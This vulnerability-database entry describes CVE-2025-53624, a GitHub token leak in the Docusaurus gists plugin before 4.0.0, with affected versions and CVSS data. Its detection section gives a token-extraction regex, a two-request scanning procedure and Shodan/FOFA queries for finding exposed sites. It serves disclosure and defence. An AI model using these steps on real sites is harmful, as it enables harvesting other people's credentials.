cbcvebase.
CVE-2025-53624
published 2025-07-09

CVE-2025-53624: The Docusaurus gists plugin adds a page to your Docusaurus instance, displaying all public gists of a GitHub user. docusaurus-plugin-content-gists versions…

PriorityP271critical10CVSS 3.1
AVNACLPRNUINSCCHIHAH
EXPLOIT
EPSS
1.84%
76.3th percentile
The Docusaurus gists plugin adds a page to your Docusaurus instance, displaying all public gists of a GitHub user. docusaurus-plugin-content-gists versions prior to 4.0.0 are vulnerable to exposing GitHub Personal Access Tokens in production build artifacts when passed through plugin configuration options. The token, intended for build-time API access only, is inadvertently included in client-side JavaScript bundles, making it accessible to anyone who can view the website's source code. This vulnerability is fixed in 4.0.0.

Affected

2 ranges
VendorProductVersion rangeFixed in
webbertakkendocusaurus-plugin-content-gists< 4.0.04.0.0
webbertakkendocusaurus-plugin-content-gists>= 0 < 4.0.04.0.0

Detection & IOCsextracted from sources · hover to see the quote

path/assets/js/main.*.js
other,personalAccessToken:"([^"]*)"}'
  • Identify Docusaurus-powered sites by checking for the 'docusaurus_locale' string in the HTML body with HTTP 200 response, then fetch the main JS bundle at /assets/js/main.*.js
  • In the fetched client-side JS bundle, search for the regex pattern ',personalAccessToken:"([^"]*)"}' to extract the exposed GitHub Personal Access Token embedded in the production build artifact
  • Use Shodan query 'http.html:"Docusaurus"' or FOFA query 'body="Docusaurus"' to enumerate potentially vulnerable Docusaurus instances for further investigation
  • The vulnerability requires exactly 2 HTTP requests: first GET to BaseURL to confirm Docusaurus and extract the JS bundle filename, then GET to the JS bundle path to confirm token presence
  • ·The token exposure only affects docusaurus-plugin-content-gists versions strictly prior to 4.0.0; version 4.0.0 and later are not vulnerable
  • ·The token is only exposed in production build artifacts (client-side JS bundles), not in development mode; scanning must target live production deployments
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.